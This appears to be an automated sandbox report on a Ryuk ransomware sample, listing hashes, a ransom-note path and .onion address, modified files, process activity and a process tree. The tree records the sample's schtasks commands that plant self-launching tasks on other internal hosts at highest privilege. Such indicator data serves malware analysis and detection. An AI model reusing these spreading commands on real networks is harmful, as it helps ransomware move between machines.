Overview
overview
10Static
static
80323b4326b...02.exe
windows7_x64
100323b4326b...02.exe
windows10_x64
100898a80dc2...92.exe
windows7_x64
100898a80dc2...92.exe
windows10_x64
100aaecf7f77...91.exe
windows7_x64
100aaecf7f77...91.exe
windows10_x64
10150e8ef3f1...02.exe
windows7_x64
10150e8ef3f1...02.exe
windows10_x64
1023e95ba676...7f.exe
windows7_x64
1023e95ba676...7f.exe
windows10_x64
1028e7dc4aeb...33.exe
windows7_x64
28e7dc4aeb...33.exe
windows10_x64
10350b0d6ae2...d7.exe
windows7_x64
1350b0d6ae2...d7.exe
windows10_x64
13a6ebac4f8...ca.exe
windows7_x64
103a6ebac4f8...ca.exe
windows10_x64
103fe801df14...4f.exe
windows7_x64
83fe801df14...4f.exe
windows10_x64
841367ad447...00.exe
windows7_x64
1041367ad447...00.exe
windows10_x64
1048f4749f13...77.exe
windows7_x64
148f4749f13...77.exe
windows10_x64
1499d936c22...82.exe
windows7_x64
10499d936c22...82.exe
windows10_x64
104b5a6926ab...d1.exe
windows7_x64
14b5a6926ab...d1.exe
windows10_x64
14bb0d8eb6b...81.exe
windows7_x64
104bb0d8eb6b...81.exe
windows10_x64
105de3d5a337...ed.exe
windows7_x64
105de3d5a337...ed.exe
windows10_x64
105e2b2fe65d...20.exe
windows7_x64
15e2b2fe65d...20.exe
windows10_x64
3Analysis
-
max time kernel
126s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
30-03-2021 11:28
Behavioral task
behavioral1
Sample
0323b4326bd6674f7d78360bb6544c4b34067066dda31e45edee91dec021e702.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
0323b4326bd6674f7d78360bb6544c4b34067066dda31e45edee91dec021e702.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
0898a80dc248a7931f8e2bf76a22a0a8d54b39a815e3fe810a2a190c50017892.exe
Resource
win7v20201028
Behavioral task
behavioral4
Sample
0898a80dc248a7931f8e2bf76a22a0a8d54b39a815e3fe810a2a190c50017892.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
0aaecf7f77132def96c13d480e32d759839fd65fa76c73e29f0f53c50714c591.exe
Resource
win7v20201028
Behavioral task
behavioral6
Sample
0aaecf7f77132def96c13d480e32d759839fd65fa76c73e29f0f53c50714c591.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
150e8ef3f1b0d5b5b2af2ffc8d540cb0e36ecdcaf5001bab2f318e36a3c25302.exe
Resource
win7v20201028
Behavioral task
behavioral8
Sample
150e8ef3f1b0d5b5b2af2ffc8d540cb0e36ecdcaf5001bab2f318e36a3c25302.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
23e95ba67603234352ff2864dc7fa54742f501e5922f01f8c182dbefc116f97f.exe
Resource
win7v20201028
Behavioral task
behavioral10
Sample
23e95ba67603234352ff2864dc7fa54742f501e5922f01f8c182dbefc116f97f.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
28e7dc4aebbfea61a2ad942f00ecab3bbb32a636679587a6fbd6c8dd69a0ef33.exe
Resource
win7v20201028
Behavioral task
behavioral12
Sample
28e7dc4aebbfea61a2ad942f00ecab3bbb32a636679587a6fbd6c8dd69a0ef33.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
350b0d6ae25e81c8394b119f4d569c083df8d17e6241d8efed0858cf91c745d7.exe
Resource
win7v20201028
Behavioral task
behavioral14
Sample
350b0d6ae25e81c8394b119f4d569c083df8d17e6241d8efed0858cf91c745d7.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
3a6ebac4f83f8b9088c9e00a25d88a56fb7e46b7b8a03158682a5d7d28f0f6ca.exe
Resource
win7v20201028
Behavioral task
behavioral16
Sample
3a6ebac4f83f8b9088c9e00a25d88a56fb7e46b7b8a03158682a5d7d28f0f6ca.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
3fe801df149ffae08275e24be6bce3de67e9d5407c0417542001f726541fbe4f.exe
Resource
win7v20201028
Behavioral task
behavioral18
Sample
3fe801df149ffae08275e24be6bce3de67e9d5407c0417542001f726541fbe4f.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
41367ad447e3d86176713af7776c1ab22d5fc7fd0fe9584f14d201b9bf071700.exe
Resource
win7v20201028
Behavioral task
behavioral20
Sample
41367ad447e3d86176713af7776c1ab22d5fc7fd0fe9584f14d201b9bf071700.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
48f4749f13582fea3e9bcc6775cce82c3c6391d2d58acd98b99d1e6acc810277.exe
Resource
win7v20201028
Behavioral task
behavioral22
Sample
48f4749f13582fea3e9bcc6775cce82c3c6391d2d58acd98b99d1e6acc810277.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe
Resource
win7v20201028
Behavioral task
behavioral24
Sample
499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
4b5a6926ab9b487fca2d33ba00b4e25f731bc52a3222a6ef3141b8703c1e2cd1.exe
Resource
win7v20201028
Behavioral task
behavioral26
Sample
4b5a6926ab9b487fca2d33ba00b4e25f731bc52a3222a6ef3141b8703c1e2cd1.exe
Resource
win10v20201028
Behavioral task
behavioral27
Sample
4bb0d8eb6b93060941730c65ac5c11625b805f91616841cdfb887d8461aef581.exe
Resource
win7v20201028
Behavioral task
behavioral28
Sample
4bb0d8eb6b93060941730c65ac5c11625b805f91616841cdfb887d8461aef581.exe
Resource
win10v20201028
Behavioral task
behavioral29
Sample
5de3d5a33745739259fc03cb5a7852440c135f960e8516d92181cd16ba76e2ed.exe
Resource
win7v20201028
Behavioral task
behavioral30
Sample
5de3d5a33745739259fc03cb5a7852440c135f960e8516d92181cd16ba76e2ed.exe
Resource
win10v20201028
Behavioral task
behavioral31
Sample
5e2b2fe65df310fe6c81acb628701c1847e772f7cf49aaa486e298a86ae85620.exe
Resource
win7v20201028
Behavioral task
behavioral32
Sample
5e2b2fe65df310fe6c81acb628701c1847e772f7cf49aaa486e298a86ae85620.exe
Resource
win10v20201028
General
-
Target
499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe
-
Size
116KB
-
MD5
be0626010b7f7f47f7416dcac841edb5
-
SHA1
d377e8211ae7a5249758402a170362164f1d8498
-
SHA256
499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282
-
SHA512
fe9091bc9fbe089ca541213ce6f33167832d4c18aa5713da8ff77266245ad3741d4cd3341b87156949f2b2e9c344090eb6f5ea36149a23ed4989467766c0b50a
Malware Config
Extracted
C:\users\Public\RyukReadMe.html
ryuk
http://etnbhivw5fjqytbmvt2o6zle3avqn6rrugfc35kmcmedbbgqbxtknlqd.onion
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Executes dropped EXE 3 IoCs
pid Process 1028 EhMeeJTczrep.exe 2632 WEhNxTAsOlan.exe 3616 rkJQduFhDlan.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4680 icacls.exe 4696 icacls.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office15\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCHARTCOMMON.DLL 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner.gif 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Grace-ppd.xrm-ms 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\plugin.js 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL001.XML 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAME.DLL 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Grace-ppd.xrm-ms 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-100.png 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\WordNet_license.txt 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_KMS_Client-ppd.xrm-ms 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\ui-strings.js 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\hyph_en_GB.dic 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_OEM_Perp-ul-phn.xrm-ms 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN108.XML 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WordCombinedFloatieModel.bin 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud_retina.png 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp-ul-oob.xrm-ms 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-ppd.xrm-ms 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\IRIS.INF 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\en-us\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_da_135x40.svg 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial2-ppd.xrm-ms 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\trdtv2r41.xsl 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_es.properties 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmdp64.msi 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\Updates\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msgr8fr.dub 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GARABD.TTF 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\README.HTM 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\msjet.xsl 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ms\RyukReadMe.html 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ChronologicalResume.dotx 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-awt.jar 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5036 schtasks.exe 4752 schtasks.exe 3060 schtasks.exe 5012 schtasks.exe 3640 schtasks.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 1196 wrote to memory of 1028 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 79 PID 1196 wrote to memory of 1028 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 79 PID 1196 wrote to memory of 1028 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 79 PID 1196 wrote to memory of 2632 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 80 PID 1196 wrote to memory of 2632 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 80 PID 1196 wrote to memory of 2632 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 80 PID 1196 wrote to memory of 3616 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 81 PID 1196 wrote to memory of 3616 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 81 PID 1196 wrote to memory of 3616 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 81 PID 1196 wrote to memory of 4680 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 82 PID 1196 wrote to memory of 4680 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 82 PID 1196 wrote to memory of 4680 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 82 PID 1196 wrote to memory of 4696 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 83 PID 1196 wrote to memory of 4696 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 83 PID 1196 wrote to memory of 4696 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 83 PID 1196 wrote to memory of 4572 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 86 PID 1196 wrote to memory of 4572 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 86 PID 1196 wrote to memory of 4572 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 86 PID 1196 wrote to memory of 4652 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 88 PID 1196 wrote to memory of 4652 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 88 PID 1196 wrote to memory of 4652 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 88 PID 1196 wrote to memory of 4708 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 90 PID 1196 wrote to memory of 4708 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 90 PID 1196 wrote to memory of 4708 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 90 PID 1196 wrote to memory of 4740 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 91 PID 1196 wrote to memory of 4740 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 91 PID 1196 wrote to memory of 4740 1196 499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe 91 PID 4740 wrote to memory of 4564 4740 net.exe 94 PID 4740 wrote to memory of 4564 4740 net.exe 94 PID 4740 wrote to memory of 4564 4740 net.exe 94 PID 4652 wrote to memory of 1960 4652 net.exe 97 PID 4652 wrote to memory of 1960 4652 net.exe 97 PID 4652 wrote to memory of 1960 4652 net.exe 97 PID 4572 wrote to memory of 5068 4572 net.exe 95 PID 4572 wrote to memory of 5068 4572 net.exe 95 PID 4572 wrote to memory of 5068 4572 net.exe 95 PID 4708 wrote to memory of 1796 4708 net.exe 96 PID 4708 wrote to memory of 1796 4708 net.exe 96 PID 4708 wrote to memory of 1796 4708 net.exe 96 PID 1028 wrote to memory of 5036 1028 EhMeeJTczrep.exe 98 PID 1028 wrote to memory of 5036 1028 EhMeeJTczrep.exe 98 PID 1028 wrote to memory of 5036 1028 EhMeeJTczrep.exe 98 PID 1028 wrote to memory of 4752 1028 EhMeeJTczrep.exe 100 PID 1028 wrote to memory of 4752 1028 EhMeeJTczrep.exe 100 PID 1028 wrote to memory of 4752 1028 EhMeeJTczrep.exe 100 PID 1028 wrote to memory of 3060 1028 EhMeeJTczrep.exe 102 PID 1028 wrote to memory of 3060 1028 EhMeeJTczrep.exe 102 PID 1028 wrote to memory of 3060 1028 EhMeeJTczrep.exe 102 PID 1028 wrote to memory of 5012 1028 EhMeeJTczrep.exe 104 PID 1028 wrote to memory of 5012 1028 EhMeeJTczrep.exe 104 PID 1028 wrote to memory of 5012 1028 EhMeeJTczrep.exe 104 PID 1028 wrote to memory of 3640 1028 EhMeeJTczrep.exe 106 PID 1028 wrote to memory of 3640 1028 EhMeeJTczrep.exe 106 PID 1028 wrote to memory of 3640 1028 EhMeeJTczrep.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe"C:\Users\Admin\AppData\Local\Temp\499d936c223743c3d2a40c3b7b1f974cedb98951f846b163d0f17d2d38ffc282.exe"1⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\EhMeeJTczrep.exe"C:\Users\Admin\AppData\Local\Temp\EhMeeJTczrep.exe" 9 REP2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.73 /TN sMKTu5p /TR "C:\Users\Public\EhMeeJTczrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:5036
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.87 /TN XzAtymf /TR "C:\Users\Public\EhMeeJTczrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4752
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.76 /TN xtsW7lH /TR "C:\Users\Public\EhMeeJTczrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3060
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.84 /TN a565Qmj /TR "C:\Users\Public\EhMeeJTczrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:5012
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.68 /TN YYTMh9g /TR "C:\Users\Public\EhMeeJTczrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3640
-
-
-
C:\Users\Admin\AppData\Local\Temp\WEhNxTAsOlan.exe"C:\Users\Admin\AppData\Local\Temp\WEhNxTAsOlan.exe" 8 LAN2⤵
- Executes dropped EXE
PID:2632
-
-
C:\Users\Admin\AppData\Local\Temp\rkJQduFhDlan.exe"C:\Users\Admin\AppData\Local\Temp\rkJQduFhDlan.exe" 8 LAN2⤵
- Executes dropped EXE
PID:3616
-
-
